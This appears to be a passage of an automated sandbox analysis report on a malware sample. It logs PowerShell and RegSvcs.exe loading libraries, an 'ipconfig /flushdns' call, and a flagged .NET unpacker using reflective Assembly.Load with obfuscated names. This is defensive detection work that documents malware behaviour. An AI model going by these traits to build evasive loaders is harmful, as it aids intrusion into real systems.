      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Xml.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBs source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdbRSDS source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb$3 source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdbMZ@ source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1673465265.000001E70CD29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1673465265.000001E70BA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1697055181.000001E723A60000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: System.Configuration.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3150292171.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.ni.pdbRSDS source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Configuration.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: ?;oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.pdbMZ source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.Xml.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: Microsoft.VisualBasic.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Core.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: %%.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbj- source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Windows.Forms.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3163033703.00000000053A1000.00000004.00000020.00020000.00000000.sdmp, WER58DA.tmp.dmp.14.dr
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3163033703.0000000005351000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Configuration.pdb@ source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Management.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Drawing.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: mscorlib.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Management.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Core.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Management.pdbH source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: @;o.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp
      Source: Binary string: System.ni.pdb source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: System.Core.ni.pdbRSDS source: WER58DA.tmp.dmp.14.dr
      Source: Binary string: HP/o0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000004.00000002.3165026994.0000000009C0B000.00000004.00000010.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -----------------------------------------.cs.Net Code: _202B_200C_206B_202B_200F_202E_206A_206B_206F_206A_206F_206D_206B_206B_202B_202E_200B_200D_206C_202C_200E_200C_206B_202B_200C_200E_202E_200B_202A_200D_200C_206E_200B_206E_206E_202A_200B_206D_202A_202C_202E System.AppDomain.Load(byte[])
      Source: 0.2.powershell.exe.1e71b9f4ea8.4.raw.unpack, -Module-.cs.Net Code: _202B_202D_200B_200C_202A_206F_206C_206C_200E_200E_202C_206B_200B_200E_202B_202B_200B_206B_200E_206D_206C_202B_200C_206F_206C_202A_200F_206F_206F_202D_206C_206A_206B_206E_202A_200C_202E_206A_200D_200F_202E System.Reflection.Assembly.Load(byte[])
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B06E83C push esp; ret 0_2_00007FFB4B06E842

      Persistence and Installation Behavior

      barindex
      Uses ipconfig to lookup or modify the Windows network settings
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
